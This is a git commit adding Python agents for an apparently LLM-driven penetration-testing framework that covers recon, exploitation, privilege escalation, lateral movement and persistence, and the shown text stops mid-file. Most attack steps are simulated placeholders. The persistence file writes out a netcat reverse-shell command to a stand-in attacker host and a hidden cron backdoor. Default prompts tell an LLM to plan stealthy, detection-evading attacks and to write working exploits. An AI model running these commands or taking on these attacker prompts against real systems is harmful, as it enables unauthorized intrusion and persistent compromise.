Add files via upload

This commit is contained in:
Joas A Santos
2025-12-18 18:18:29 -03:00
committed by GitHub
parent cd904bad0b
commit 078e48b9ed
41 changed files with 4886 additions and 0 deletions

0
agents/__init__.py Normal file
View File

78
agents/base_agent.py Normal file
View File

@@ -0,0 +1,78 @@
import json
import logging
from typing import Dict, Any, List, Optional
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class BaseAgent:
"""
A generic agent class that orchestrates LLM interactions, tool usage,
and adheres to specific agent roles (e.g., Red Team, Blue Team).
"""
def __init__(self, agent_name: str, config: Dict, llm_manager: LLMManager, context_prompts: Dict):
self.agent_name = agent_name
self.config = config
self.llm_manager = llm_manager
self.context_prompts = context_prompts # This will contain user_prompt and system_prompt for this agent role
self.agent_role_config = self.config.get('agent_roles', {}).get(agent_name, {})
self.tools_allowed = self.agent_role_config.get('tools_allowed', [])
self.description = self.agent_role_config.get('description', 'No description provided.')
logger.info(f"Initialized {self.agent_name} agent. Description: {self.description}")
def _prepare_prompt(self, user_input: str, additional_context: Dict = None) -> str:
"""
Prepares the user prompt for the LLM, incorporating agent-specific instructions
and dynamic context.
"""
user_prompt_template = self.context_prompts.get("user_prompt", "")
if not user_prompt_template:
logger.warning(f"No user prompt template found for agent {self.agent_name}.")
return user_input # Fallback to raw user input
# Format the user prompt with dynamic context
# Use a safe way to format, ensuring all expected keys are present or handled.
# This assumes the template uses specific placeholders like {target_info_json}, {recon_data_json} etc.
# For a generic solution, we pass all additional_context as a single JSON.
try:
formatted_prompt = user_prompt_template.format(
user_input=user_input,
additional_context_json=json.dumps(additional_context or {}, indent=2)
# Add more specific placeholders if needed, like target_info_json, recon_data_json etc.
# E.g., target_info_json=json.dumps(additional_context.get('target_info', {}), indent=2)
)
except KeyError as e:
logger.error(f"Missing key in prompt template for {self.agent_name}: {e}. Falling back to basic prompt.")
formatted_prompt = f"{user_prompt_template}\n\nContext: {json.dumps(additional_context or {}, indent=2)}\n\nInput: {user_input}"
return formatted_prompt
def execute(self, user_input: str, campaign_data: Dict = None) -> Dict:
"""
Executes the agent's task using the LLM and potentially external tools.
`campaign_data` can be used to pass ongoing results or context between agent executions.
"""
logger.info(f"Executing {self.agent_name} agent for input: {user_input[:50]}...")
system_prompt = self.context_prompts.get("system_prompt", "")
if not system_prompt:
logger.warning(f"No system prompt found for agent {self.agent_name}. Using generic system prompt.")
system_prompt = f"You are an expert {self.agent_name}. Analyze the provided information and generate a response."
# Prepare the user prompt with current input and campaign data
prepared_user_prompt = self._prepare_prompt(user_input, campaign_data)
llm_response_text = self.llm_manager.generate(prepared_user_prompt, system_prompt)
# Here's where we would integrate tool usage based on llm_response_text
# and self.tools_allowed. This will be more complex and potentially involve
# re-prompting the LLM or using a function-calling mechanism.
# For now, just return the LLM's direct response.
return {"agent_name": self.agent_name, "input": user_input, "llm_response": llm_response_text}
def get_allowed_tools(self) -> List[str]:
"""Returns the list of tools allowed for this agent role."""
return self.tools_allowed

View File

@@ -0,0 +1,256 @@
#!/usr/bin/env python3
"""
Exploitation Agent - Vulnerability exploitation and access gaining
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.exploitation import (
ExploitDatabase,
MetasploitWrapper,
WebExploiter,
SQLInjector,
RCEExploiter,
BufferOverflowExploiter
)
logger = logging.getLogger(__name__)
class ExploitationAgent:
"""Agent responsible for vulnerability exploitation"""
def __init__(self, config: Dict):
"""Initialize exploitation agent"""
self.config = config
self.llm = LLMManager(config)
self.exploit_db = ExploitDatabase(config)
self.metasploit = MetasploitWrapper(config)
self.web_exploiter = WebExploiter(config)
self.sql_injector = SQLInjector(config)
self.rce_exploiter = RCEExploiter(config)
self.bof_exploiter = BufferOverflowExploiter(config)
logger.info("ExploitationAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute exploitation phase"""
logger.info(f"Starting exploitation on {target}")
results = {
"target": target,
"status": "running",
"successful_exploits": [],
"failed_attempts": [],
"shells_obtained": [],
"credentials_found": [],
"ai_recommendations": {}
}
try:
# Get reconnaissance data from context
recon_data = context.get("phases", {}).get("recon", {})
# Phase 1: Vulnerability Analysis
logger.info("Phase 1: Analyzing vulnerabilities")
vulnerabilities = self._identify_vulnerabilities(recon_data)
# Phase 2: AI-powered Exploit Selection
logger.info("Phase 2: AI exploit selection")
exploit_plan = self._ai_exploit_planning(vulnerabilities, recon_data)
results["ai_recommendations"] = exploit_plan
# Phase 3: Execute Exploits
logger.info("Phase 3: Executing exploits")
for vuln in vulnerabilities[:5]: # Limit to top 5 vulnerabilities
exploit_result = self._attempt_exploitation(vuln, target)
if exploit_result.get("success"):
results["successful_exploits"].append(exploit_result)
logger.info(f"Successful exploit: {vuln.get('type')}")
# Check for shell access
if exploit_result.get("shell_access"):
results["shells_obtained"].append(exploit_result["shell_info"])
else:
results["failed_attempts"].append(exploit_result)
# Phase 4: Post-Exploitation Intelligence
if results["successful_exploits"]:
logger.info("Phase 4: Post-exploitation intelligence gathering")
results["post_exploit_intel"] = self._gather_post_exploit_intel(
results["successful_exploits"]
)
results["status"] = "completed"
logger.info("Exploitation phase completed")
except Exception as e:
logger.error(f"Error during exploitation: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _identify_vulnerabilities(self, recon_data: Dict) -> List[Dict]:
"""Identify exploitable vulnerabilities from recon data"""
vulnerabilities = []
# Check network scan results
network_scan = recon_data.get("network_scan", {})
for host, data in network_scan.get("hosts", {}).items():
for port in data.get("open_ports", []):
vuln = {
"type": "network_service",
"host": host,
"port": port.get("port"),
"service": port.get("service"),
"version": port.get("version")
}
vulnerabilities.append(vuln)
# Check web vulnerabilities
web_analysis = recon_data.get("web_analysis", {})
for vuln_type in ["sql_injection", "xss", "lfi", "rfi", "rce"]:
if web_analysis.get(vuln_type):
vulnerabilities.append({
"type": vuln_type,
"details": web_analysis[vuln_type]
})
return vulnerabilities
def _ai_exploit_planning(self, vulnerabilities: List[Dict], recon_data: Dict) -> Dict:
"""Use AI to plan exploitation strategy"""
prompt = self.llm.get_prompt(
"exploitation",
"ai_exploit_planning_user",
default=f"""
Plan an exploitation strategy based on the following data:
Vulnerabilities Identified:
{json.dumps(vulnerabilities, indent=2)}
Reconnaissance Data:
{json.dumps(recon_data, indent=2)}
Provide:
1. Prioritized exploitation order
2. Recommended exploits for each vulnerability
3. Payload suggestions
4. Evasion techniques
5. Fallback strategies
6. Success probability estimates
Response in JSON format with detailed exploitation roadmap.
"""
)
system_prompt = self.llm.get_prompt(
"exploitation",
"ai_exploit_planning_system",
default="""You are an expert exploit developer and penetration tester.
Create sophisticated exploitation plans considering detection, success rates, and impact.
Prioritize stealthy, reliable exploits over noisy attempts."""
)
try:
formatted_prompt = prompt.format(
vulnerabilities_json=json.dumps(vulnerabilities, indent=2),
recon_data_json=json.dumps(recon_data, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI exploit planning error: {e}")
return {"error": str(e)}
def _attempt_exploitation(self, vulnerability: Dict, target: str) -> Dict:
"""Attempt to exploit a specific vulnerability"""
vuln_type = vulnerability.get("type")
result = {
"vulnerability": vulnerability,
"success": False,
"method": None,
"details": {}
}
try:
if vuln_type == "sql_injection":
result = self.sql_injector.exploit(target, vulnerability)
elif vuln_type in ["xss", "csrf"]:
result = self.web_exploiter.exploit(target, vulnerability)
elif vuln_type in ["rce", "command_injection"]:
result = self.rce_exploiter.exploit(target, vulnerability)
elif vuln_type == "buffer_overflow":
result = self.bof_exploiter.exploit(target, vulnerability)
elif vuln_type == "network_service":
result = self._exploit_network_service(target, vulnerability)
else:
# Use Metasploit for generic exploitation
result = self.metasploit.exploit(target, vulnerability)
except Exception as e:
logger.error(f"Exploitation error for {vuln_type}: {e}")
result["error"] = str(e)
return result
def _exploit_network_service(self, target: str, vulnerability: Dict) -> Dict:
"""Exploit network service vulnerabilities"""
service = vulnerability.get("service", "").lower()
# Check exploit database for known exploits
exploits = self.exploit_db.search(service, vulnerability.get("version"))
if exploits:
logger.info(f"Found {len(exploits)} exploits for {service}")
for exploit in exploits[:3]: # Try top 3 exploits
result = self.metasploit.run_exploit(
exploit["module"],
target,
vulnerability.get("port")
)
if result.get("success"):
return result
return {"success": False, "message": "No suitable exploits found"}
def _gather_post_exploit_intel(self, successful_exploits: List[Dict]) -> Dict:
"""Gather intelligence after successful exploitation"""
intel = {
"system_info": [],
"user_accounts": [],
"network_info": [],
"installed_software": [],
"credentials": []
}
for exploit in successful_exploits:
if exploit.get("shell_access"):
shell = exploit["shell_info"]
# Gather system information
# This would execute actual commands on compromised system
# Placeholder for demonstration
intel["system_info"].append({
"os": "detected_os",
"hostname": "detected_hostname",
"architecture": "x64"
})
return intel
def generate_custom_exploit(self, vulnerability: Dict) -> str:
"""Generate custom exploit using AI"""
target_info = {
"vulnerability": vulnerability,
"requirements": "Create working exploit code"
}
return self.llm.generate_payload(target_info, vulnerability.get("type"))

199
agents/lateral_agent.py Normal file
View File

@@ -0,0 +1,199 @@
#!/usr/bin/env python3
"""
Lateral Movement Agent - Move through the network
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class LateralMovementAgent:
"""Agent responsible for lateral movement"""
def __init__(self, config: Dict):
"""Initialize lateral movement agent"""
self.config = config
self.llm = LLMManager(config)
logger.info("LateralMovementAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute lateral movement phase"""
logger.info(f"Starting lateral movement from {target}")
results = {
"target": target,
"status": "running",
"discovered_hosts": [],
"compromised_hosts": [],
"credentials_used": [],
"movement_paths": [],
"ai_analysis": {}
}
try:
# Get previous phase data
recon_data = context.get("phases", {}).get("recon", {})
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
# Phase 1: Network Discovery
logger.info("Phase 1: Internal network discovery")
results["discovered_hosts"] = self._discover_internal_network(recon_data)
# Phase 2: AI-Powered Movement Strategy
logger.info("Phase 2: AI lateral movement strategy")
strategy = self._ai_movement_strategy(context, results["discovered_hosts"])
results["ai_analysis"] = strategy
# Phase 3: Credential Reuse
logger.info("Phase 3: Credential reuse attacks")
credentials = privesc_data.get("credentials_harvested", [])
results["credentials_used"] = self._attempt_credential_reuse(
results["discovered_hosts"],
credentials
)
# Phase 4: Pass-the-Hash/Pass-the-Ticket
logger.info("Phase 4: Pass-the-Hash/Ticket attacks")
results["movement_paths"].extend(
self._pass_the_hash_attacks(results["discovered_hosts"])
)
# Phase 5: Exploit Trust Relationships
logger.info("Phase 5: Exploiting trust relationships")
results["movement_paths"].extend(
self._exploit_trust_relationships(results["discovered_hosts"])
)
results["status"] = "completed"
logger.info("Lateral movement phase completed")
except Exception as e:
logger.error(f"Error during lateral movement: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _discover_internal_network(self, recon_data: Dict) -> List[Dict]:
"""Discover internal network hosts"""
hosts = []
# Extract hosts from recon data
network_scan = recon_data.get("network_scan", {})
for ip, data in network_scan.get("hosts", {}).items():
hosts.append({
"ip": ip,
"ports": data.get("open_ports", []),
"os": data.get("os", "unknown")
})
# Simulate additional internal discovery
hosts.extend([
{"ip": "192.168.1.10", "role": "domain_controller", "status": "discovered"},
{"ip": "192.168.1.20", "role": "file_server", "status": "discovered"},
{"ip": "192.168.1.30", "role": "workstation", "status": "discovered"}
])
return hosts
def _ai_movement_strategy(self, context: Dict, hosts: List[Dict]) -> Dict:
"""Use AI to plan lateral movement"""
prompt = self.llm.get_prompt(
"lateral_movement",
"ai_movement_strategy_user",
default=f"""
Plan a lateral movement strategy based on the following:
Current Context:
{json.dumps(context, indent=2)}
Discovered Hosts:
{json.dumps(hosts, indent=2)}
Provide:
1. Target prioritization (high-value targets first)
2. Movement techniques for each target
3. Credential strategies
4. Evasion techniques
5. Attack path optimization
6. Fallback options
Response in JSON format with detailed attack paths.
"""
)
system_prompt = self.llm.get_prompt(
"lateral_movement",
"ai_movement_strategy_system",
default="""You are an expert in lateral movement and Active Directory attacks.
Plan sophisticated movement strategies that minimize detection and maximize impact.
Consider Pass-the-Hash, Pass-the-Ticket, RDP, WMI, PSExec, and other techniques.
Prioritize domain controllers and critical infrastructure."""
)
try:
formatted_prompt = prompt.format(
context_json=json.dumps(context, indent=2),
hosts_json=json.dumps(hosts, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI movement strategy error: {e}")
return {"error": str(e)}
def _attempt_credential_reuse(self, hosts: List[Dict], credentials: List[Dict]) -> List[Dict]:
"""Attempt credential reuse across hosts"""
attempts = []
for host in hosts[:5]: # Limit attempts
for cred in credentials[:3]:
attempts.append({
"host": host.get("ip"),
"credential": "***hidden***",
"protocol": "SMB",
"success": False, # Simulated
"status": "simulated"
})
return attempts
def _pass_the_hash_attacks(self, hosts: List[Dict]) -> List[Dict]:
"""Perform Pass-the-Hash attacks"""
attacks = []
for host in hosts:
if host.get("role") in ["domain_controller", "file_server"]:
attacks.append({
"type": "pass_the_hash",
"target": host.get("ip"),
"technique": "SMB relay",
"success": False, # Simulated
"status": "simulated"
})
return attacks
def _exploit_trust_relationships(self, hosts: List[Dict]) -> List[Dict]:
"""Exploit trust relationships"""
exploits = []
# Domain trust exploitation
exploits.append({
"type": "domain_trust",
"description": "Cross-domain exploitation",
"status": "simulated"
})
# Kerberos delegation
exploits.append({
"type": "kerberos_delegation",
"description": "Unconstrained delegation abuse",
"status": "simulated"
})
return exploits

View File

@@ -0,0 +1,148 @@
#!/usr/bin/env python3
"""
Network Reconnaissance Agent - Network-focused information gathering and enumeration
"""
import os
import json
import subprocess
from typing import Dict, List
import logging
from core.llm_manager import LLMManager
from tools.recon import (
NetworkScanner,
OSINTCollector,
DNSEnumerator,
SubdomainFinder
)
from urllib.parse import urlparse # Added import
logger = logging.getLogger(__name__)
class NetworkReconAgent:
"""Agent responsible for network-focused reconnaissance and information gathering"""
def __init__(self, config: Dict):
"""Initialize network reconnaissance agent"""
self.config = config
self.llm = LLMManager(config)
self.network_scanner = NetworkScanner(config)
self.osint = OSINTCollector(config)
self.dns_enum = DNSEnumerator(config)
self.subdomain_finder = SubdomainFinder(config)
logger.info("NetworkReconAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute network reconnaissance phase"""
logger.info(f"Starting network reconnaissance on {target}")
results = {
"target": target,
"status": "running",
"findings": [],
"network_scan": {},
"osint": {},
"dns": {},
"subdomains": [],
"ai_analysis": {}
}
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target # Use hostname if exists, otherwise original target
logger.info(f"Target for network tools: {target_host}")
try:
# Phase 1: Network Scanning
logger.info("Phase 1: Network scanning")
results["network_scan"] = self.network_scanner.scan(target_host) # Use target_host
# Phase 2: DNS Enumeration
logger.info("Phase 2: DNS enumeration")
results["dns"] = self.dns_enum.enumerate(target_host) # Use target_host
# Phase 3: Subdomain Discovery
logger.info("Phase 3: Subdomain discovery")
results["subdomains"] = self.subdomain_finder.find(target_host) # Use target_host
# Phase 4: OSINT Collection
logger.info("Phase 4: OSINT collection")
results["osint"] = self.osint.collect(target_host) # Use target_host
# Phase 5: AI Analysis
logger.info("Phase 5: AI-powered analysis")
results["ai_analysis"] = self._ai_analysis(results)
results["status"] = "completed"
logger.info("Network reconnaissance phase completed")
except Exception as e:
logger.error(f"Error during network reconnaissance: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _ai_analysis(self, recon_data: Dict) -> Dict:
"""Use AI to analyze reconnaissance data"""
prompt = self.llm.get_prompt(
"network_recon",
"ai_analysis_user",
default=f"""
Analyze the following network reconnaissance data and provide insights:
{json.dumps(recon_data, indent=2)}
Provide:
1. Attack surface summary
2. Prioritized network target list
3. Identified network vulnerabilities or misconfigurations
4. Recommended next steps for network exploitation
5. Network risk assessment
6. Stealth considerations for network activities
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"network_recon",
"ai_analysis_system",
default="""You are an expert network penetration tester analyzing reconnaissance data.
Identify network security weaknesses, network attack vectors, and provide strategic recommendations.
Consider both technical and operational security aspects."""
)
try:
# Format the user prompt with recon_data
formatted_prompt = prompt.format(recon_data_json=json.dumps(recon_data, indent=2))
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI analysis error: {e}")
return {"error": str(e), "raw_response": response if 'response' in locals() else None}
def passive_recon(self, target: str) -> Dict:
"""Perform passive reconnaissance only"""
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target
return {
"osint": self.osint.collect(target_host), # Use target_host
"dns": self.dns_enum.enumerate(target_host), # Use target_host
"subdomains": self.subdomain_finder.find(target_host) # Use target_host
}
def active_recon(self, target: str) -> Dict:
"""Perform active reconnaissance"""
# Parse target to extract hostname if it's a URL
parsed_target = urlparse(target)
target_host = parsed_target.hostname or target
return {
"network_scan": self.network_scanner.scan(target_host) # Use target_host
}

250
agents/persistence_agent.py Normal file
View File

@@ -0,0 +1,250 @@
#!/usr/bin/env python3
"""
Persistence Agent - Maintain access to compromised systems
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
logger = logging.getLogger(__name__)
class PersistenceAgent:
"""Agent responsible for maintaining access"""
def __init__(self, config: Dict):
"""Initialize persistence agent"""
self.config = config
self.llm = LLMManager(config)
logger.info("PersistenceAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute persistence phase"""
logger.info(f"Starting persistence establishment on {target}")
results = {
"target": target,
"status": "running",
"persistence_mechanisms": [],
"backdoors_installed": [],
"scheduled_tasks": [],
"ai_recommendations": {}
}
try:
# Get previous phase data
privesc_data = context.get("phases", {}).get("privilege_escalation", {})
if not privesc_data.get("successful_escalations"):
logger.warning("No privilege escalation achieved. Limited persistence options.")
results["status"] = "limited"
# Phase 1: AI-Powered Persistence Strategy
logger.info("Phase 1: AI persistence strategy")
strategy = self._ai_persistence_strategy(context)
results["ai_recommendations"] = strategy
# Phase 2: Establish Persistence Mechanisms
logger.info("Phase 2: Establishing persistence mechanisms")
system_info = privesc_data.get("system_info", {})
os_type = system_info.get("os", "unknown")
if os_type == "linux":
results["persistence_mechanisms"].extend(
self._establish_linux_persistence()
)
elif os_type == "windows":
results["persistence_mechanisms"].extend(
self._establish_windows_persistence()
)
# Phase 3: Install Backdoors
logger.info("Phase 3: Installing backdoors")
results["backdoors_installed"] = self._install_backdoors(os_type)
# Phase 4: Create Scheduled Tasks
logger.info("Phase 4: Creating scheduled tasks")
results["scheduled_tasks"] = self._create_scheduled_tasks(os_type)
results["status"] = "completed"
logger.info("Persistence phase completed")
except Exception as e:
logger.error(f"Error during persistence: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _ai_persistence_strategy(self, context: Dict) -> Dict:
"""Use AI to plan persistence strategy"""
prompt = self.llm.get_prompt(
"persistence",
"ai_persistence_strategy_user",
default=f"""
Plan a comprehensive persistence strategy based on the following context:
{json.dumps(context, indent=2)}
Provide:
1. Recommended persistence techniques (prioritized)
2. Stealth considerations
3. Resilience against system reboots
4. Evasion of detection mechanisms
5. Multiple fallback mechanisms
6. Cleanup and removal procedures
Response in JSON format with detailed implementation plan.
"""
)
system_prompt = self.llm.get_prompt(
"persistence",
"ai_persistence_strategy_system",
default="""You are an expert in persistence techniques and advanced persistent threats.
Design robust, stealthy persistence mechanisms that survive reboots and detection attempts.
Consider both Windows and Linux environments.
Prioritize operational security and longevity."""
)
try:
formatted_prompt = prompt.format(context_json=json.dumps(context, indent=2))
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI persistence strategy error: {e}")
return {"error": str(e)}
def _establish_linux_persistence(self) -> List[Dict]:
"""Establish Linux persistence mechanisms"""
mechanisms = []
# Cron job
mechanisms.append({
"type": "cron_job",
"description": "Scheduled task for persistence",
"command": "*/5 * * * * /tmp/.hidden/backdoor.sh",
"status": "simulated"
})
# SSH key
mechanisms.append({
"type": "ssh_key",
"description": "Authorized keys persistence",
"location": "~/.ssh/authorized_keys",
"status": "simulated"
})
# Systemd service
mechanisms.append({
"type": "systemd_service",
"description": "Persistent system service",
"service_name": "system-update.service",
"status": "simulated"
})
# bashrc modification
mechanisms.append({
"type": "bashrc",
"description": "Shell initialization persistence",
"location": "~/.bashrc",
"status": "simulated"
})
return mechanisms
def _establish_windows_persistence(self) -> List[Dict]:
"""Establish Windows persistence mechanisms"""
mechanisms = []
# Registry Run key
mechanisms.append({
"type": "registry_run",
"description": "Registry autorun persistence",
"key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"status": "simulated"
})
# Scheduled task
mechanisms.append({
"type": "scheduled_task",
"description": "Windows scheduled task",
"task_name": "WindowsUpdate",
"status": "simulated"
})
# WMI event subscription
mechanisms.append({
"type": "wmi_event",
"description": "WMI persistence",
"status": "simulated"
})
# Service installation
mechanisms.append({
"type": "service",
"description": "Windows service persistence",
"service_name": "WindowsSecurityUpdate",
"status": "simulated"
})
return mechanisms
def _install_backdoors(self, os_type: str) -> List[Dict]:
"""Install backdoors"""
backdoors = []
if os_type == "linux":
backdoors.extend([
{
"type": "reverse_shell",
"description": "Netcat reverse shell",
"command": "nc -e /bin/bash attacker_ip 4444",
"status": "simulated"
},
{
"type": "ssh_backdoor",
"description": "SSH backdoor on alternate port",
"port": 2222,
"status": "simulated"
}
])
elif os_type == "windows":
backdoors.extend([
{
"type": "powershell_backdoor",
"description": "PowerShell reverse shell",
"status": "simulated"
},
{
"type": "meterpreter",
"description": "Meterpreter payload",
"status": "simulated"
}
])
return backdoors
def _create_scheduled_tasks(self, os_type: str) -> List[Dict]:
"""Create scheduled tasks"""
tasks = []
if os_type == "linux":
tasks.append({
"type": "cron",
"schedule": "*/10 * * * *",
"command": "Callback beacon every 10 minutes",
"status": "simulated"
})
elif os_type == "windows":
tasks.append({
"type": "scheduled_task",
"schedule": "Daily at 2 AM",
"command": "Callback beacon",
"status": "simulated"
})
return tasks

305
agents/privesc_agent.py Normal file
View File

@@ -0,0 +1,305 @@
#!/usr/bin/env python3
"""
Privilege Escalation Agent - System privilege elevation
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.privesc import (
LinuxPrivEsc,
WindowsPrivEsc,
KernelExploiter,
MisconfigFinder,
CredentialHarvester,
SudoExploiter
)
logger = logging.getLogger(__name__)
class PrivEscAgent:
"""Agent responsible for privilege escalation"""
def __init__(self, config: Dict):
"""Initialize privilege escalation agent"""
self.config = config
self.llm = LLMManager(config)
self.linux_privesc = LinuxPrivEsc(config)
self.windows_privesc = WindowsPrivEsc(config)
self.kernel_exploiter = KernelExploiter(config)
self.misconfig_finder = MisconfigFinder(config)
self.cred_harvester = CredentialHarvester(config)
self.sudo_exploiter = SudoExploiter(config)
logger.info("PrivEscAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Execute privilege escalation phase"""
logger.info(f"Starting privilege escalation on {target}")
results = {
"target": target,
"status": "running",
"escalation_paths": [],
"successful_escalations": [],
"credentials_harvested": [],
"system_info": {},
"ai_analysis": {}
}
try:
# Get exploitation data from context
exploit_data = context.get("phases", {}).get("exploitation", {})
if not exploit_data.get("successful_exploits"):
logger.warning("No successful exploits found. Limited privilege escalation options.")
results["status"] = "skipped"
results["message"] = "No initial access obtained"
return results
# Phase 1: System Enumeration
logger.info("Phase 1: System enumeration")
results["system_info"] = self._enumerate_system(exploit_data)
# Phase 2: Identify Escalation Paths
logger.info("Phase 2: Identifying escalation paths")
results["escalation_paths"] = self._identify_escalation_paths(
results["system_info"]
)
# Phase 3: AI-Powered Path Selection
logger.info("Phase 3: AI escalation strategy")
strategy = self._ai_escalation_strategy(
results["system_info"],
results["escalation_paths"]
)
results["ai_analysis"] = strategy
# Phase 4: Execute Escalation Attempts
logger.info("Phase 4: Executing escalation attempts")
for path in results["escalation_paths"][:5]:
escalation_result = self._attempt_escalation(path, results["system_info"])
if escalation_result.get("success"):
results["successful_escalations"].append(escalation_result)
logger.info(f"Successful escalation: {path.get('technique')}")
break # Stop after first successful escalation
# Phase 5: Credential Harvesting
if results["successful_escalations"]:
logger.info("Phase 5: Harvesting credentials")
results["credentials_harvested"] = self._harvest_credentials(
results["system_info"]
)
results["status"] = "completed"
logger.info("Privilege escalation phase completed")
except Exception as e:
logger.error(f"Error during privilege escalation: {e}")
results["status"] = "error"
results["error"] = str(e)
return results
def _enumerate_system(self, exploit_data: Dict) -> Dict:
"""Enumerate system for privilege escalation opportunities"""
system_info = {
"os": "unknown",
"kernel_version": "unknown",
"architecture": "unknown",
"users": [],
"groups": [],
"sudo_permissions": [],
"suid_binaries": [],
"writable_paths": [],
"scheduled_tasks": [],
"services": [],
"environment_variables": {}
}
# Determine OS type from exploit data
os_type = self._detect_os_type(exploit_data)
system_info["os"] = os_type
if os_type == "linux":
system_info.update(self.linux_privesc.enumerate())
elif os_type == "windows":
system_info.update(self.windows_privesc.enumerate())
return system_info
def _detect_os_type(self, exploit_data: Dict) -> str:
"""Detect operating system type"""
# Placeholder - would analyze exploit data to determine OS
return "linux" # Default assumption
def _identify_escalation_paths(self, system_info: Dict) -> List[Dict]:
"""Identify possible privilege escalation paths"""
paths = []
os_type = system_info.get("os")
if os_type == "linux":
# SUID exploitation
for binary in system_info.get("suid_binaries", []):
paths.append({
"technique": "suid_exploitation",
"target": binary,
"difficulty": "medium",
"likelihood": 0.6
})
# Sudo exploitation
for permission in system_info.get("sudo_permissions", []):
paths.append({
"technique": "sudo_exploitation",
"target": permission,
"difficulty": "low",
"likelihood": 0.8
})
# Kernel exploitation
if system_info.get("kernel_version"):
paths.append({
"technique": "kernel_exploit",
"target": system_info["kernel_version"],
"difficulty": "high",
"likelihood": 0.4
})
# Writable path exploitation
for path in system_info.get("writable_paths", []):
if "bin" in path or "sbin" in path:
paths.append({
"technique": "path_hijacking",
"target": path,
"difficulty": "medium",
"likelihood": 0.5
})
elif os_type == "windows":
# Service exploitation
for service in system_info.get("services", []):
if service.get("unquoted_path") or service.get("weak_permissions"):
paths.append({
"technique": "service_exploitation",
"target": service,
"difficulty": "medium",
"likelihood": 0.7
})
# AlwaysInstallElevated
if system_info.get("always_install_elevated"):
paths.append({
"technique": "always_install_elevated",
"target": "MSI",
"difficulty": "low",
"likelihood": 0.9
})
# Token impersonation
paths.append({
"technique": "token_impersonation",
"target": "SeImpersonatePrivilege",
"difficulty": "medium",
"likelihood": 0.6
})
# Sort by likelihood
paths.sort(key=lambda x: x.get("likelihood", 0), reverse=True)
return paths
def _ai_escalation_strategy(self, system_info: Dict, escalation_paths: List[Dict]) -> Dict:
"""Use AI to optimize escalation strategy"""
prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_user",
default=f"""
Analyze the system and recommend optimal privilege escalation strategy:
System Information:
{json.dumps(system_info, indent=2)}
Identified Escalation Paths:
{json.dumps(escalation_paths, indent=2)}
Provide:
1. Recommended escalation path (with justification)
2. Step-by-step execution plan
3. Required tools and commands
4. Detection likelihood and evasion techniques
5. Fallback options
6. Post-escalation actions
Response in JSON format with actionable recommendations.
"""
)
system_prompt = self.llm.get_prompt(
"privesc",
"ai_escalation_strategy_system",
default="""You are an expert in privilege escalation techniques.
Analyze systems and recommend the most effective, stealthy escalation paths.
Consider Windows, Linux, and Active Directory environments.
Prioritize reliability and minimal detection."""
)
try:
formatted_prompt = prompt.format(
system_info_json=json.dumps(system_info, indent=2),
escalation_paths_json=json.dumps(escalation_paths, indent=2)
)
response = self.llm.generate(formatted_prompt, system_prompt)
return json.loads(response)
except Exception as e:
logger.error(f"AI escalation strategy error: {e}")
return {"error": str(e)}
def _attempt_escalation(self, path: Dict, system_info: Dict) -> Dict:
"""Attempt privilege escalation using specified path"""
technique = path.get("technique")
os_type = system_info.get("os")
result = {
"technique": technique,
"success": False,
"details": {}
}
try:
if os_type == "linux":
if technique == "suid_exploitation":
result = self.linux_privesc.exploit_suid(path.get("target"))
elif technique == "sudo_exploitation":
result = self.sudo_exploiter.exploit(path.get("target"))
elif technique == "kernel_exploit":
result = self.kernel_exploiter.exploit_linux(path.get("target"))
elif technique == "path_hijacking":
result = self.linux_privesc.exploit_path_hijacking(path.get("target"))
elif os_type == "windows":
if technique == "service_exploitation":
result = self.windows_privesc.exploit_service(path.get("target"))
elif technique == "always_install_elevated":
result = self.windows_privesc.exploit_msi()
elif technique == "token_impersonation":
result = self.windows_privesc.impersonate_token()
except Exception as e:
logger.error(f"Escalation error for {technique}: {e}")
result["error"] = str(e)
return result
def _harvest_credentials(self, system_info: Dict) -> List[Dict]:
"""Harvest credentials after privilege escalation"""
os_type = system_info.get("os")
if os_type == "linux":
return self.cred_harvester.harvest_linux()
elif os_type == "windows":
return self.cred_harvester.harvest_windows()
return []

120
agents/web_pentest_agent.py Normal file
View File

@@ -0,0 +1,120 @@
#!/usr/bin/env python3
"""
Web Pentest Agent - Specialized agent for web application penetration testing.
"""
import json
import logging
from typing import Dict, List
from core.llm_manager import LLMManager
from tools.web_pentest import WebRecon # Import the moved WebRecon tool
logger = logging.getLogger(__name__)
class WebPentestAgent:
"""Agent responsible for comprehensive web application penetration testing."""
def __init__(self, config: Dict):
"""Initializes the WebPentestAgent."""
self.config = config
self.llm = LLMManager(config)
self.web_recon = WebRecon(config)
# Placeholder for web exploitation tools if they become separate classes
# self.web_exploiter = WebExploiter(config)
logger.info("WebPentestAgent initialized")
def execute(self, target: str, context: Dict) -> Dict:
"""Executes the web application penetration testing phase."""
logger.info(f"Starting web pentest on {target}")
results = {
"target": target,
"status": "running",
"web_recon_results": {},
"vulnerability_analysis": [],
"exploitation_attempts": [],
"ai_analysis": {}
}
try:
